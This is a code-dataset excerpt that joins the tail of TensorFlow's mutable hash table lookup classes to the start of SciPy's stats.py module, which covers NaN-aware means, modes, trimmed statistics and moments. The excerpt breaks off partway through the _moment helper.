            self._table_ref, self._key_dtype, self._value_dtype, name=name)

    exported_values.set_shape(exported_keys.get_shape().concatenate(
        self._value_shape))
    return exported_keys, exported_values

  class _Saveable(BaseSaverBuilder.SaveableObject):
    """SaveableObject implementation for MutableHashTable."""

    def __init__(self, table, name):
      # Snapshot the table as two tensors (keys, values) for checkpointing.
      tensors = table.export()
      specs = [
          BaseSaverBuilder.SaveSpec(tensors[0], "", name + "-keys"),
          BaseSaverBuilder.SaveSpec(tensors[1], "", name + "-values")
      ]
      # pylint: disable=protected-access
      super(MutableHashTable._Saveable, self).__init__(table, specs, name)

    def restore(self, restored_tensors, unused_restored_shapes):
      # Reload all saved key/value pairs into the wrapped table.
      # pylint: disable=protected-access
      with ops.colocate_with(self.op._table_ref):
        return gen_lookup_ops._lookup_table_import_v2(
            self.op._table_ref, restored_tensors[0], restored_tensors[1])
class MutableDenseHashTable(LookupInterface):
  """A generic mutable hash table implementation using tensors as backing store.

  Data can be inserted by calling the insert method. It does not support
  initialization via the init method.

  It uses "open addressing" with quadratic reprobing to resolve collisions.
  Compared to `MutableHashTable` the insert and lookup operations in a
  `MutableDenseHashTable` are typically faster, but memory usage can be higher.
  However, `MutableDenseHashTable` does not require additional memory for
  temporary tensors created during checkpointing and restore operations.

  Example usage:

  ```python
  table = tf.contrib.lookup.MutableDenseHashTable(key_dtype=tf.int64,
                                                  value_dtype=tf.int64,
                                                  default_value=-1,
                                                  empty_key=0)
  table.insert(keys, values)
  out = table.lookup(query_keys)
  print(out.eval())
  ```
  """

  # TODO(andreasst): consider extracting common code with MutableHashTable into
  # a common superclass.
  def __init__(self,
               key_dtype,
               value_dtype,
               default_value,
               empty_key,
               initial_num_buckets=None,
               shared_name=None,
               name="MutableDenseHashTable",
               checkpoint=True):
    """Creates an empty `MutableDenseHashTable` object.

    Creates a table, the type of its keys and values are specified by key_dtype
    and value_dtype, respectively.

    Args:
      key_dtype: the type of the key tensors.
      value_dtype: the type of the value tensors.
      default_value: The value to use if a key is missing in the table.
      empty_key: the key to use to represent empty buckets internally. Must not
        be used in insert or lookup operations.
      initial_num_buckets: the initial number of buckets.
      shared_name: If non-empty, this table will be shared under
        the given name across multiple sessions.
      name: A name for the operation (optional).
      checkpoint: if True, the contents of the table are saved to and restored
        from checkpoints. If `shared_name` is empty for a checkpointed table, it
        is shared using the table node name.

    Returns:
      A `MutableHashTable` object.

    Raises:
      ValueError: If checkpoint is True and no name was specified.
    """
    self._default_value = ops.convert_to_tensor(
        default_value, dtype=value_dtype)
    # The value shape is derived from the default value; lookup/export results
    # carry this shape appended to the key dimensions.
    self._value_shape = self._default_value.get_shape()

    # The table must be shared if checkpointing is requested for multi-worker
    # training to work correctly. Use the node name if no shared_name has been
    # explicitly specified.
    use_node_name_sharing = checkpoint and shared_name is None
    empty_key = ops.convert_to_tensor(empty_key, dtype=key_dtype)
    # pylint: disable=protected-access
    self._table_ref = gen_lookup_ops._mutable_dense_hash_table_v2(
        empty_key=empty_key,
        shared_name=shared_name,
        use_node_name_sharing=use_node_name_sharing,
        value_dtype=value_dtype,
        value_shape=self._value_shape,
        initial_num_buckets=initial_num_buckets,
        name=name)
    # pylint: enable=protected-access
    # The table's name is the last component of the created op's name.
    super(MutableDenseHashTable, self).__init__(
        key_dtype, value_dtype, self._table_ref.op.name.split("/")[-1])

    if checkpoint:
      # Register a SaveableObject so tf.train.Saver checkpoints the contents.
      saveable = MutableDenseHashTable._Saveable(self, name)
      ops.add_to_collection(ops.GraphKeys.SAVEABLE_OBJECTS, saveable)

  def size(self, name=None):
    """Compute the number of elements in this table.

    Args:
      name: A name for the operation (optional).

    Returns:
      A scalar tensor containing the number of elements in this table.
    """
    with ops.name_scope(name, "%s_Size" % self._name,
                        [self._table_ref]) as name:
      with ops.colocate_with(self._table_ref):
        # pylint: disable=protected-access
        return gen_lookup_ops._lookup_table_size_v2(self._table_ref, name=name)

  def lookup(self, keys, name=None):
    """Looks up `keys` in a table, outputs the corresponding values.

    The `default_value` is used for keys not present in the table.

    Args:
      keys: Keys to look up. Can be a tensor of any shape. Must match the
        table's key_dtype.
      name: A name for the operation (optional).

    Returns:
      A tensor containing the values in the same shape as `keys` using the
      table's value type.

    Raises:
      TypeError: when `keys` do not match the table data types.
    """
    if keys.dtype != self._key_dtype:
      raise TypeError("Signature mismatch. Keys must be dtype %s, got %s." %
                      (self._key_dtype, keys.dtype))

    with ops.name_scope(name, "%s_lookup_table_find" % self._name,
                        [self._table_ref, keys]) as name:
      with ops.colocate_with(self._table_ref):
        # pylint: disable=protected-access
        values = gen_lookup_ops._lookup_table_find_v2(
            self._table_ref, keys, self._default_value, name=name)

    if keys.get_shape().ndims is not None and keys.get_shape().ndims > 0:
      # Static shape hint: first key dimension followed by the value shape.
      # NOTE(review): only dims[0] of `keys` is propagated; for rank > 1 keys
      # the intermediate dimensions are left unknown — confirm intended.
      values.set_shape(
          tensor_shape.TensorShape([keys.get_shape().dims[0]]).concatenate(
              self._value_shape))
    return values

  def insert(self, keys, values, name=None):
    """Associates `keys` with `values`.

    Args:
      keys: Keys to insert. Can be a tensor of any shape. Must match the
        table's key type.
      values: Values to be associated with keys. Must be a tensor of the same
        shape as `keys` and match the table's value type.
      name: A name for the operation (optional).

    Returns:
      The created Operation.

    Raises:
      TypeError: when `keys` or `values` doesn't match the table data
        types.
    """
    # pylint: disable=protected-access
    lookup_ops._check_table_dtypes(self, keys.dtype, values.dtype)
    # pylint: enable=protected-access
    with ops.name_scope(name, "%s_lookup_table_insert" % self._name,
                        [self._table_ref, keys, values]) as name:
      with ops.colocate_with(self._table_ref):
        # pylint: disable=protected-access
        op = gen_lookup_ops._lookup_table_insert_v2(
            self._table_ref, keys, values, name=name)
      return op

  def export(self, name=None):
    """Returns tensors of all keys and values in the table.

    Args:
      name: A name for the operation (optional).

    Returns:
      A pair of tensors with the first tensor containing all keys and the
      second tensors containing all values in the table.
    """
    with ops.name_scope(name, "%s_lookup_table_export_values" % self._name,
                        [self._table_ref]) as name:
      with ops.colocate_with(self._table_ref):
        # pylint: disable=protected-access
        exported_keys, exported_values = gen_lookup_ops._lookup_table_export_v2(
            self._table_ref, self._key_dtype, self._value_dtype, name=name)

    # Static shape hint: exported values are the keys' shape plus value shape.
    exported_values.set_shape(exported_keys.get_shape().concatenate(
        self._value_shape))
    return exported_keys, exported_values

  class _Saveable(BaseSaverBuilder.SaveableObject):
    """SaveableObject implementation for MutableDenseHashTable."""

    def __init__(self, table, name):
      # Save the full table contents as two tensors: "<name>-keys" and
      # "<name>-values", produced by export().
      tensors = table.export()
      specs = [
          BaseSaverBuilder.SaveSpec(tensors[0], "", name + "-keys"),
          BaseSaverBuilder.SaveSpec(tensors[1], "", name + "-values")
      ]
      # pylint: disable=protected-access
      super(MutableDenseHashTable._Saveable, self).__init__(table, specs, name)

    def restore(self, restored_tensors, unused_restored_shapes):
      """Imports the checkpointed keys/values back into the table."""
      # pylint: disable=protected-access
      with ops.colocate_with(self.op._table_ref):
        return gen_lookup_ops._lookup_table_import_v2(
            self.op._table_ref, restored_tensors[0], restored_tensors[1])
| apache-2.0 |
Srisai85/scipy | scipy/stats/stats.py | 18 | 169352 | # Copyright (c) Gary Strangman. All rights reserved
#
# Disclaimer
#
# This software is provided "as-is". There are no expressed or implied
# warranties of any kind, including, but not limited to, the warranties
# of merchantability and fitness for a given application. In no event
# shall Gary Strangman be liable for any direct, indirect, incidental,
# special, exemplary or consequential damages (including, but not limited
# to, loss of use, data or profits, or business interruption) however
# caused and on any theory of liability, whether in contract, strict
# liability or tort (including negligence or otherwise) arising in any way
# out of the use of this software, even if advised of the possibility of
# such damage.
#
#
# Heavily adapted for use by SciPy 2002 by Travis Oliphant
"""
A collection of basic statistical functions for python. The function
names appear below.
Some scalar functions defined here are also available in the scipy.special
package where they work on arbitrary sized arrays.
Disclaimers: The function list is obviously incomplete and, worse, the
functions are not optimized. All functions have been tested (some more
so than others), but they are far from bulletproof. Thus, as with any
free software, no warranty or guarantee is expressed or implied. :-) A
few extra functions that don't appear in the list below can be found by
interested treasure-hunters. These functions don't necessarily have
both list and array versions but were deemed useful.
Central Tendency
----------------
.. autosummary::
:toctree: generated/
gmean
hmean
mode
Moments
-------
.. autosummary::
:toctree: generated/
moment
variation
skew
kurtosis
normaltest
Moments Handling NaN:
.. autosummary::
:toctree: generated/
nanmean
nanmedian
nanstd
Altered Versions
----------------
.. autosummary::
:toctree: generated/
tmean
tvar
tstd
tsem
describe
Frequency Stats
---------------
.. autosummary::
:toctree: generated/
itemfreq
scoreatpercentile
percentileofscore
histogram
cumfreq
relfreq
Variability
-----------
.. autosummary::
:toctree: generated/
obrientransform
signaltonoise
sem
Trimming Functions
------------------
.. autosummary::
:toctree: generated/
threshold
trimboth
trim1
Correlation Functions
---------------------
.. autosummary::
:toctree: generated/
pearsonr
fisher_exact
spearmanr
pointbiserialr
kendalltau
linregress
theilslopes
Inferential Stats
-----------------
.. autosummary::
:toctree: generated/
ttest_1samp
ttest_ind
ttest_ind_from_stats
ttest_rel
chisquare
power_divergence
ks_2samp
mannwhitneyu
ranksums
wilcoxon
kruskal
friedmanchisquare
combine_pvalues
Probability Calculations
------------------------
.. autosummary::
:toctree: generated/
chisqprob
betai
ANOVA Functions
---------------
.. autosummary::
:toctree: generated/
f_oneway
f_value
Support Functions
-----------------
.. autosummary::
:toctree: generated/
ss
square_of_sums
rankdata
References
----------
.. [CRCProbStat2000] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
Probability and Statistics Tables and Formulae. Chapman & Hall: New
York. 2000.
"""
from __future__ import division, print_function, absolute_import
import warnings
import math
from collections import namedtuple
from scipy._lib.six import xrange
# Scipy imports.
from scipy._lib.six import callable, string_types
from numpy import array, asarray, ma, zeros
import scipy.special as special
import scipy.linalg as linalg
import numpy as np
from . import distributions
from . import mstats_basic
from ._distn_infrastructure import _lazywhere
from ._stats_mstats_common import find_repeats, linregress, theilslopes
from ._rank import rankdata, tiecorrect
__all__ = ['find_repeats', 'gmean', 'hmean', 'mode', 'tmean', 'tvar',
'tmin', 'tmax', 'tstd', 'tsem', 'moment', 'variation',
'skew', 'kurtosis', 'describe', 'skewtest', 'kurtosistest',
'normaltest', 'jarque_bera', 'itemfreq',
'scoreatpercentile', 'percentileofscore', 'histogram',
'histogram2', 'cumfreq', 'relfreq', 'obrientransform',
'signaltonoise', 'sem', 'zmap', 'zscore', 'threshold',
'sigmaclip', 'trimboth', 'trim1', 'trim_mean', 'f_oneway',
'pearsonr', 'fisher_exact', 'spearmanr', 'pointbiserialr',
'kendalltau', 'linregress', 'theilslopes', 'ttest_1samp',
'ttest_ind', 'ttest_ind_from_stats', 'ttest_rel', 'kstest',
'chisquare', 'power_divergence', 'ks_2samp', 'mannwhitneyu',
'tiecorrect', 'ranksums', 'kruskal', 'friedmanchisquare',
'chisqprob', 'betai',
'f_value_wilks_lambda', 'f_value', 'f_value_multivariate',
'ss', 'square_of_sums', 'fastsort', 'rankdata', 'nanmean',
'nanstd', 'nanmedian', 'combine_pvalues', ]
def _chk_asarray(a, axis):
if axis is None:
a = np.ravel(a)
outaxis = 0
else:
a = np.asarray(a)
outaxis = axis
if a.ndim == 0:
a = np.atleast_1d(a)
return a, outaxis
def _chk2_asarray(a, b, axis):
if axis is None:
a = np.ravel(a)
b = np.ravel(b)
outaxis = 0
else:
a = np.asarray(a)
b = np.asarray(b)
outaxis = axis
if a.ndim == 0:
a = np.atleast_1d(a)
if b.ndim == 0:
b = np.atleast_1d(b)
return a, b, outaxis
def _contains_nan(a, nan_policy='propagate'):
if nan_policy not in ('propagate', 'raise', 'omit'):
raise ValueError("nan_policy must be either 'propagate', 'raise', or "
"'ignore'")
try:
# Calling np.sum to avoid creating a huge array into memory
# e.g. np.isnan(a).any()
with np.errstate(invalid='ignore'):
contains_nan = np.isnan(np.sum(a))
except TypeError:
# If the check cannot be properly performed we fallback to omiting
# nan values and raising a warning. This can happen when attempting to
# sum things that are not numbers (e.g. as in the function `mode`).
contains_nan = False
nan_policy = 'omit'
warnings.warn("The input array could not be properly checked for nan "
"values. nan values will be ignored.", RuntimeWarning)
if contains_nan and nan_policy == 'raise':
raise ValueError("The input contains nan values")
return (contains_nan, nan_policy)
#######
# NAN friendly functions
########
@np.deprecate(message="scipy.stats.nanmean is deprecated in scipy 0.15.0 "
              "in favour of numpy.nanmean.")
def nanmean(x, axis=0):
    """
    Mean over the given axis, ignoring NaN entries.

    Parameters
    ----------
    x : ndarray
        Input array.
    axis : int or None, optional
        Axis along which the mean is computed (default 0). None means the
        whole array.

    Returns
    -------
    m : float
        The mean of `x`, ignoring nans.

    See Also
    --------
    nanstd, nanmedian

    Examples
    --------
    >>> from scipy import stats
    >>> a = np.linspace(0, 4, 3)
    >>> a[-1] = np.nan
    >>> stats.nanmean(a)
    1.0
    """
    x, axis = _chk_asarray(x, axis)
    x = x.copy()
    n_total = x.shape[axis]
    bad = np.isnan(x)
    # Fraction of valid (non-NaN) entries along `axis`: dividing the mean of
    # the zero-filled data by it rescales to a mean over valid entries only.
    valid_frac = 1.0 - np.sum(bad, axis) / n_total
    x[bad] = 0.0
    return np.mean(x, axis) / valid_frac
@np.deprecate(message="scipy.stats.nanstd is deprecated in scipy 0.15 "
              "in favour of numpy.nanstd.\nNote that numpy.nanstd "
              "has a different signature.")
def nanstd(x, axis=0, bias=False):
    """
    Standard deviation over the given axis, ignoring NaN entries.

    Parameters
    ----------
    x : array_like
        Input array.
    axis : int or None, optional
        Axis along which the standard deviation is computed (default 0).
        None means the whole array.
    bias : bool, optional
        If True, normalize by N (biased); otherwise by N - 1 (default).

    Returns
    -------
    s : float
        The standard deviation.

    See Also
    --------
    nanmean, nanmedian

    Examples
    --------
    >>> from scipy import stats
    >>> a = np.arange(10, dtype=float)
    >>> a[1:3] = np.nan
    >>> stats.nanstd(a)
    2.9154759474226504
    """
    x, axis = _chk_asarray(x, axis)
    x = x.copy()
    n_total = x.shape[axis]
    bad = np.isnan(x)
    n_bad = np.sum(bad, axis) * 1.0
    n_valid = n_total - n_bad
    x[bad] = 0.0
    mean_valid = np.sum(x, axis) / n_valid

    # Deviations from the per-slice mean. Reduction along axis 0 broadcasts
    # directly; for any other axis the mean must be re-expanded first.
    if axis:
        dev = x - np.expand_dims(mean_valid, axis)
    else:
        dev = x - mean_valid
    dev *= dev

    # Each zero-filled NaN slot contributed mean**2 to the sum of squared
    # deviations; subtract those spurious contributions back out.
    sum_sq = np.sum(dev, axis) - mean_valid * mean_valid * n_bad
    return np.sqrt(sum_sq / n_valid if bias else sum_sq / (n_valid - 1.0))
def _nanmedian(arr1d): # This only works on 1d arrays
"""Private function for rank a arrays. Compute the median ignoring Nan.
Parameters
----------
arr1d : ndarray
Input array, of rank 1.
Results
-------
m : float
The median.
"""
x = arr1d.copy()
c = np.isnan(x)
s = np.where(c)[0]
if s.size == x.size:
warnings.warn("All-NaN slice encountered", RuntimeWarning)
return np.nan
elif s.size != 0:
# select non-nans at end of array
enonan = x[-s.size:][~c[-s.size:]]
# fill nans in beginning of array with non-nans of end
x[s[:enonan.size]] = enonan
# slice nans away
x = x[:-s.size]
return np.median(x, overwrite_input=True)
@np.deprecate(message="scipy.stats.nanmedian is deprecated in scipy 0.15 "
              "in favour of numpy.nanmedian.")
def nanmedian(x, axis=0):
    """
    Median along the given axis, ignoring NaN values.

    Parameters
    ----------
    x : array_like
        Input array.
    axis : int or None, optional
        Axis along which the median is computed (default 0). None means
        the whole array.

    Returns
    -------
    m : float
        The median of `x` along `axis`.

    See Also
    --------
    nanstd, nanmean, numpy.nanmedian

    Examples
    --------
    >>> from scipy import stats
    >>> a = np.array([0, 3, 1, 5, 5, np.nan])
    >>> stats.nanmedian(a)
    array(3.0)
    """
    arr, axis = _chk_asarray(x, axis)
    if arr.ndim == 0:
        return float(arr.item())

    if hasattr(np, 'nanmedian'):  # delegate to numpy >= 1.9, faster for some cases
        return np.nanmedian(arr, axis)

    result = np.apply_along_axis(_nanmedian, axis, arr)
    return float(result.item()) if result.ndim == 0 else result
#####################################
# CENTRAL TENDENCY #
#####################################
def gmean(a, axis=0, dtype=None):
    """
    Geometric mean along the specified axis.

    Returns the n-th root of ``x1 * x2 * ... * xn``, computed via the
    exponential of the mean log for numerical stability.

    Parameters
    ----------
    a : array_like
        Input array or object convertible to an array.
    axis : int or None, optional
        Axis along which the geometric mean is computed (default 0).
        None means the whole array.
    dtype : dtype, optional
        Type of the returned array and of the accumulator. Defaults to the
        dtype of `a` (promoted to the platform integer for low-precision
        integer inputs).

    Returns
    -------
    gmean : ndarray
        See `dtype` parameter above.

    See Also
    --------
    numpy.mean : Arithmetic average
    numpy.average : Weighted average
    hmean : Harmonic mean

    Notes
    -----
    float64 intermediate and return values are used for integer inputs.
    Use masked arrays to ignore any non-finite values in the input or that
    arise in the calculations, as masked arrays mask them automatically.
    """
    if not isinstance(a, np.ndarray):
        # Not an ndarray: convert (honoring any requested dtype) first.
        logs = np.log(np.array(a, dtype=dtype))
    elif dtype:
        # Must override the default dtype while preserving the array type
        # (masked arrays stay masked).
        caster = np.ma.asarray if isinstance(a, np.ma.MaskedArray) else np.asarray
        logs = np.log(caster(a, dtype=dtype))
    else:
        logs = np.log(a)
    return np.exp(logs.mean(axis=axis))
def hmean(a, axis=0, dtype=None):
    """
    Harmonic mean along the specified axis.

    That is: ``n / (1/x1 + 1/x2 + ... + 1/xn)``. Only defined when every
    element is strictly positive.

    Parameters
    ----------
    a : array_like
        Input array, masked array or object convertible to an array.
    axis : int or None, optional
        Axis along which the harmonic mean is computed (default 0).
        None means the whole array.
    dtype : dtype, optional
        Type of the returned array and of the accumulator. Defaults to the
        dtype of `a` (promoted to the platform integer for low-precision
        integer inputs).

    Returns
    -------
    hmean : ndarray
        See `dtype` parameter above.

    Raises
    ------
    ValueError
        If any element of `a` is not strictly positive.

    See Also
    --------
    numpy.mean : Arithmetic average
    numpy.average : Weighted average
    gmean : Geometric mean
    """
    if not isinstance(a, np.ndarray):
        a = np.array(a, dtype=dtype)

    # Harmonic mean only defined if all elements are greater than zero.
    if not np.all(a > 0):
        raise ValueError("Harmonic mean only defined if all elements greater than zero")

    if isinstance(a, np.ma.MaskedArray):
        size = a.count(axis)
    elif axis is None:
        a = a.ravel()
        size = a.shape[0]
    else:
        size = a.shape[axis]
    return size / np.sum(1.0/a, axis=axis, dtype=dtype)
def mode(a, axis=0, nan_policy='propagate'):
    """
    Returns an array of the modal (most common) value in the passed array.

    If there is more than one such value, only the first is returned.
    The bin-count for the modal bins is also returned.

    Parameters
    ----------
    a : array_like
        n-dimensional array of which to find mode(s).
    axis : int or None, optional
        Axis along which to operate. Default is 0. If None, compute over
        the whole array `a`.
    nan_policy : {'propagate', 'raise', 'omit'}, optional
        Defines how to handle when input contains nan. 'propagate' returns nan,
        'raise' throws an error, 'omit' performs the calculations ignoring nan
        values. Default is 'propagate'.

    Returns
    -------
    mode : ndarray
        Array of modal values.
    count : ndarray
        Array of counts for each mode.

    Examples
    --------
    >>> a = np.array([[6, 8, 3, 0],
    ...               [3, 2, 1, 7],
    ...               [8, 1, 8, 4],
    ...               [5, 3, 0, 5],
    ...               [4, 7, 5, 9]])
    >>> from scipy import stats
    >>> stats.mode(a)
    (array([[3, 1, 0, 0]]), array([[1, 1, 1, 1]]))

    To get mode of whole array, specify ``axis=None``:

    >>> stats.mode(a, axis=None)
    (array([3]), array([3]))
    """
    a, axis = _chk_asarray(a, axis)
    # Define the result type once (the original defined it twice and the
    # empty case returned a plain tuple; a namedtuple is still a 2-tuple,
    # so existing unpacking callers are unaffected).
    ModeResult = namedtuple('ModeResult', ('mode', 'count'))

    if a.size == 0:
        return ModeResult(np.array([]), np.array([]))

    contains_nan, nan_policy = _contains_nan(a, nan_policy)

    if contains_nan and nan_policy == 'omit':
        a = ma.masked_invalid(a)
        return mstats_basic.mode(a, axis)

    scores = np.unique(np.ravel(a))  # get ALL unique values
    testshape = list(a.shape)
    testshape[axis] = 1
    oldmostfreq = np.zeros(testshape, dtype=a.dtype)
    oldcounts = np.zeros(testshape, dtype=int)

    # One pass per unique value: keep the running argmax of the per-slice
    # counts, preferring the earlier (smaller) score on ties.
    for score in scores:
        template = (a == score)
        counts = np.expand_dims(np.sum(template, axis), axis)
        mostfrequent = np.where(counts > oldcounts, score, oldmostfreq)
        oldcounts = np.maximum(counts, oldcounts)
        oldmostfreq = mostfrequent

    return ModeResult(mostfrequent, oldcounts)
def _mask_to_limits(a, limits, inclusive):
"""Mask an array for values outside of given limits.
This is primarily a utility function.
Parameters
----------
a : array
limits : (float or None, float or None)
A tuple consisting of the (lower limit, upper limit). Values in the
input array less than the lower limit or greater than the upper limit
will be masked out. None implies no limit.
inclusive : (bool, bool)
A tuple consisting of the (lower flag, upper flag). These flags
determine whether values exactly equal to lower or upper are allowed.
Returns
-------
A MaskedArray.
Raises
------
A ValueError if there are no values within the given limits.
"""
lower_limit, upper_limit = limits
lower_include, upper_include = inclusive
am = ma.MaskedArray(a)
if lower_limit is not None:
if lower_include:
am = ma.masked_less(am, lower_limit)
else:
am = ma.masked_less_equal(am, lower_limit)
if upper_limit is not None:
if upper_include:
am = ma.masked_greater(am, upper_limit)
else:
am = ma.masked_greater_equal(am, upper_limit)
if am.count() == 0:
raise ValueError("No array values within given limits")
return am
def tmean(a, limits=None, inclusive=(True, True), axis=None):
    """
    Trimmed mean: arithmetic mean ignoring values outside `limits`.

    Parameters
    ----------
    a : array_like
        Array of values.
    limits : None or (lower limit, upper limit), optional
        Values outside this interval are ignored; None (default) keeps
        everything. Either bound may itself be None (half-open interval).
    inclusive : (bool, bool), optional
        Whether values exactly equal to the lower/upper limit are included.
        Default (True, True).
    axis : int or None, optional
        Axis along which to compute. Default is None.

    Returns
    -------
    tmean : float

    See also
    --------
    trim_mean : returns mean after trimming a proportion from both tails.

    Examples
    --------
    >>> from scipy import stats
    >>> x = np.arange(20)
    >>> stats.tmean(x)
    9.5
    >>> stats.tmean(x, (3,17))
    10.0
    """
    a = asarray(a)
    if limits is None:
        # No trimming requested: plain mean over the flattened array.
        return np.mean(a, None)

    masked = _mask_to_limits(a.ravel(), limits, inclusive)
    return masked.mean(axis=axis)
def tvar(a, limits=None, inclusive=(True, True), axis=0, ddof=1):
    """
    Trimmed variance: sample variance ignoring values outside `limits`.

    Parameters
    ----------
    a : array_like
        Array of values.
    limits : None or (lower limit, upper limit), optional
        Values outside this interval are ignored; None (default) keeps
        everything. Either bound may itself be None (half-open interval).
    inclusive : (bool, bool), optional
        Whether values exactly equal to the lower/upper limit are included.
        Default (True, True).
    axis : int or None, optional
        Axis along which to operate (default 0); None means the whole array.
    ddof : int, optional
        Delta degrees of freedom. Default is 1.

    Returns
    -------
    tvar : float
        Trimmed variance.

    Notes
    -----
    Computes the unbiased sample variance, i.e. it applies the
    ``n / (n - 1)`` correction.

    Examples
    --------
    >>> from scipy import stats
    >>> x = np.arange(20)
    >>> stats.tvar(x)
    35.0
    >>> stats.tvar(x, (3,17))
    20.0
    """
    arr = asarray(a).astype(float).ravel()
    if limits is None:
        n = arr.size
        # Convert the biased (N-normalized) variance to the unbiased one.
        return arr.var() * n / (n - 1.)

    masked = _mask_to_limits(arr, limits, inclusive)
    return np.ma.var(masked, ddof=ddof, axis=axis)
def tmin(a, lowerlimit=None, axis=0, inclusive=True, nan_policy='propagate'):
    """
    Trimmed minimum: the smallest value of `a` along `axis`, considering
    only values greater than a specified lower limit.

    Parameters
    ----------
    a : array_like
        Array of values.
    lowerlimit : None or float, optional
        Values below this limit are ignored; None (default) keeps all values.
    axis : int or None, optional
        Axis along which to operate (default 0); None means the whole array.
    inclusive : {True, False}, optional
        Whether values exactly equal to `lowerlimit` are included.
        Default True.
    nan_policy : {'propagate', 'raise', 'omit'}, optional
        Defines how to handle when input contains nan. 'propagate' returns
        nan, 'raise' throws an error, 'omit' ignores nan values.
        Default is 'propagate'.

    Returns
    -------
    tmin : float, int or ndarray

    Examples
    --------
    >>> from scipy import stats
    >>> x = np.arange(20)
    >>> stats.tmin(x)
    0
    >>> stats.tmin(x, 13)
    13
    >>> stats.tmin(x, 13, inclusive=False)
    14
    """
    a, axis = _chk_asarray(a, axis)
    masked = _mask_to_limits(a, (lowerlimit, None), (inclusive, False))

    contains_nan, nan_policy = _contains_nan(masked, nan_policy)
    if contains_nan and nan_policy == 'omit':
        masked = ma.masked_invalid(masked)

    result = ma.minimum.reduce(masked, axis).data
    return result[()] if result.ndim == 0 else result
def tmax(a, upperlimit=None, axis=0, inclusive=True, nan_policy='propagate'):
    """
    Trimmed maximum: the largest value of `a` along `axis`, considering
    only values smaller than a specified upper limit.

    Parameters
    ----------
    a : array_like
        Array of values.
    upperlimit : None or float, optional
        Values above this limit are ignored; None (default) keeps all values.
    axis : int or None, optional
        Axis along which to operate (default 0); None means the whole array.
    inclusive : {True, False}, optional
        Whether values exactly equal to `upperlimit` are included.
        Default True.
    nan_policy : {'propagate', 'raise', 'omit'}, optional
        Defines how to handle when input contains nan. 'propagate' returns
        nan, 'raise' throws an error, 'omit' ignores nan values.
        Default is 'propagate'.

    Returns
    -------
    tmax : float, int or ndarray

    Examples
    --------
    >>> from scipy import stats
    >>> x = np.arange(20)
    >>> stats.tmax(x)
    19
    >>> stats.tmax(x, 13)
    13
    >>> stats.tmax(x, 13, inclusive=False)
    12
    """
    a, axis = _chk_asarray(a, axis)
    masked = _mask_to_limits(a, (None, upperlimit), (False, inclusive))

    contains_nan, nan_policy = _contains_nan(masked, nan_policy)
    if contains_nan and nan_policy == 'omit':
        masked = ma.masked_invalid(masked)

    result = ma.maximum.reduce(masked, axis).data
    return result[()] if result.ndim == 0 else result
def tstd(a, limits=None, inclusive=(True, True), axis=0, ddof=1):
    """
    Trimmed sample standard deviation: ignores values outside `limits`.

    Parameters
    ----------
    a : array_like
        Array of values.
    limits : None or (lower limit, upper limit), optional
        Values outside this interval are ignored; None (default) keeps
        everything. Either bound may itself be None (half-open interval).
    inclusive : (bool, bool), optional
        Whether values exactly equal to the lower/upper limit are included.
        Default (True, True).
    axis : int or None, optional
        Axis along which to operate (default 0); None means the whole array.
    ddof : int, optional
        Delta degrees of freedom. Default is 1.

    Returns
    -------
    tstd : float

    Notes
    -----
    Computes the unbiased sample standard deviation, i.e. it applies the
    ``n / (n - 1)`` correction.

    Examples
    --------
    >>> from scipy import stats
    >>> x = np.arange(20)
    >>> stats.tstd(x)
    5.9160797830996161
    >>> stats.tstd(x, (3,17))
    4.4721359549995796
    """
    # The trimmed std is simply the square root of the trimmed variance.
    trimmed_variance = tvar(a, limits, inclusive, axis, ddof)
    return np.sqrt(trimmed_variance)
def tsem(a, limits=None, inclusive=(True, True), axis=0, ddof=1):
    """
    Trimmed standard error of the mean: ignores values outside `limits`.

    Parameters
    ----------
    a : array_like
        Array of values.
    limits : None or (lower limit, upper limit), optional
        Values outside this interval are ignored; None (default) keeps
        everything. Either bound may itself be None (half-open interval).
    inclusive : (bool, bool), optional
        Whether values exactly equal to the lower/upper limit are included.
        Default (True, True).
    axis : int or None, optional
        Axis along which to operate (default 0); None means the whole array.
    ddof : int, optional
        Delta degrees of freedom. Default is 1.

    Returns
    -------
    tsem : float

    Notes
    -----
    Uses the unbiased sample standard deviation, i.e. it applies the
    ``n / (n - 1)`` correction.

    Examples
    --------
    >>> from scipy import stats
    >>> x = np.arange(20)
    >>> stats.tsem(x)
    1.3228756555322954
    >>> stats.tsem(x, (3,17))
    1.1547005383792515
    """
    arr = np.asarray(a).ravel()
    if limits is None:
        return arr.std(ddof=ddof) / np.sqrt(arr.size)

    masked = _mask_to_limits(arr, limits, inclusive)
    trimmed_std = np.sqrt(np.ma.var(masked, ddof=ddof, axis=axis))
    return trimmed_std / np.sqrt(masked.count())
#####################################
# MOMENTS #
#####################################
def moment(a, moment=1, axis=0, nan_policy='propagate'):
    r"""
    Calculates the nth moment about the mean for a sample.

    A moment is a specific quantitative measure of the shape of a set of
    points. It is often used to calculate coefficients of skewness and
    kurtosis due to its close relationship with them.

    Parameters
    ----------
    a : array_like
        data
    moment : int or array_like of ints, optional
        order of central moment that is returned. Default is 1.
    axis : int or None, optional
        Axis along which the central moment is computed (default 0).
        None means the whole array.
    nan_policy : {'propagate', 'raise', 'omit'}, optional
        Defines how to handle when input contains nan. 'propagate' returns
        nan, 'raise' throws an error, 'omit' ignores nan values.
        Default is 'propagate'.

    Returns
    -------
    n-th central moment : ndarray or float
        The appropriate moment along the given axis or over all values if
        axis is None. The denominator is the number of observations; no
        degrees-of-freedom correction is applied.

    See also
    --------
    kurtosis, skew, describe

    Notes
    -----
    The k-th central moment of a data sample is:

    .. math::

        m_k = \frac{1}{n} \sum_{i = 1}^n (x_i - \bar{x})^k

    where n is the number of samples and x-bar is the mean. This function
    uses exponentiation by squares [1]_ for efficiency.

    References
    ----------
    .. [1] http://eli.thegreenplace.net/2009/03/21/efficient-integer-exponentiation-algorithms
    """
    a, axis = _chk_asarray(a, axis)
    contains_nan, nan_policy = _contains_nan(a, nan_policy)

    if contains_nan:
        if nan_policy == 'omit':
            return mstats_basic.moment(ma.masked_invalid(a), moment, axis)
        if nan_policy == 'propagate':
            return np.nan

    if a.size == 0:
        # Empty input: return nan(s) with a shape matching `moment`.
        if np.isscalar(moment):
            return np.nan
        return np.full(np.asarray(moment).shape, np.nan, dtype=np.float64)

    if np.isscalar(moment):
        return _moment(a, moment, axis)
    # array_like `moment`: compute one central moment per requested order.
    return np.array([_moment(a, order, axis) for order in moment])
def _moment(a, moment, axis):
    """Compute the `moment`-th central moment of `a` along `axis`.

    Internal helper for `moment`; `moment` must be a (scalar) integer.
    Orders 0 and 1 are returned directly from their definitions (1 and 0);
